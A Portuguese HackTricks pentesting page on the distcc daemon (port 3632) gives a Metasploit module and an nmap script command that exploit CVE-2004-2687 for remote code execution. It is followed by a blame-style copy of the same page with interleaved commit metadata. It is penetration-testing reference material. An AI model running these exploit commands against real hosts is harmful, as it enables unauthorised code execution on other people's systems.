hacktricks/network-services-pentesting/3632-pentesting-distcc.md

{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
{% endhint %}


# Informações Básicas

**Distcc** é uma ferramenta que melhora o **processo de compilação** utilizando o **poder de processamento ocioso** de outros computadores na rede. Quando **distcc** é configurado em uma máquina, essa máquina é capaz de distribuir suas **tarefas de compilação** para outro sistema. Este sistema receptor deve estar executando o **daemon distccd** e deve ter um **compilador compatível** instalado para processar o código enviado.

**Porta padrão:** 3632
```
PORT     STATE SERVICE
3632/tcp open  distccd
```
# Exploração

Verifique se é vulnerável a **CVE-2004-2687** para executar código arbitrário:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
# Shodan

_Eu não acho que o shodan detecta este serviço._

# Resources

* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)
* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)

Post criado por **Álex B (@r1p)**


{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
{% endhint %}
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`{% hint style="success" %}`
			`Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Translated ['network-services-pentesting/10000-network-data-management-p 2024-01-05 23:03:45 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`<details>`
Translated ['network-services-pentesting/10000-network-data-management-p 2024-01-05 23:03:45 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`<summary>Support HackTricks</summary>`
Translated ['network-services-pentesting/10000-network-data-management-p 2024-01-05 23:03:45 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`* Confira os [planos de assinatura](https://github.com/sponsors/carlospolop)!`
			`* Junte-se ao 💬 [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Compartilhe truques de hacking enviando PRs para os repositórios do [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
Translated ['network-services-pentesting/10000-network-data-management-p 2024-01-05 23:03:45 +00:00
			`</details>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['network-services-pentesting/10000-network-data-management-p 2024-01-05 23:03:45 +00:00
Translated ['network-services-pentesting/3632-pentesting-distcc.md'] to 2024-03-11 14:44:51 +00:00			`# Informações Básicas`
Translated ['network-services-pentesting/10000-network-data-management-p 2024-01-05 23:03:45 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`Distcc é uma ferramenta que melhora o processo de compilação utilizando o poder de processamento ocioso de outros computadores na rede. Quando distcc é configurado em uma máquina, essa máquina é capaz de distribuir suas tarefas de compilação para outro sistema. Este sistema receptor deve estar executando o daemon distccd e deve ter um compilador compatível instalado para processar o código enviado.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Porta padrão: 3632`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`PORT STATE SERVICE`
			`3632/tcp open distccd`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`# Exploração`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`Verifique se é vulnerável a CVE-2004-2687 para executar código arbitrário:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`msf5 > use exploit/unix/misc/distcc_exec`
Translated ['network-services-pentesting/3632-pentesting-distcc.md'] to 2024-03-11 14:44:51 +00:00			`nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```
fix mess 2 2022-05-01 12:49:36 +00:00			`# Shodan`
GitBook: [master] one page modified 2020-10-05 10:16:52 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`_Eu não acho que o shodan detecta este serviço._`
GitBook: [master] one page modified 2020-10-05 10:16:52 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`# Resources`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes 2024-02-09 12:48:36 +00:00			`* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Post criado por Álex B (@r1p)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`{% hint style="success" %}`
			`Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`<summary>Support HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`* Confira os [planos de assinatura](https://github.com/sponsors/carlospolop)!`
			`* Junte-se ao 💬 [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Compartilhe truques de hacking enviando PRs para os repositórios do [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`{% endhint %}`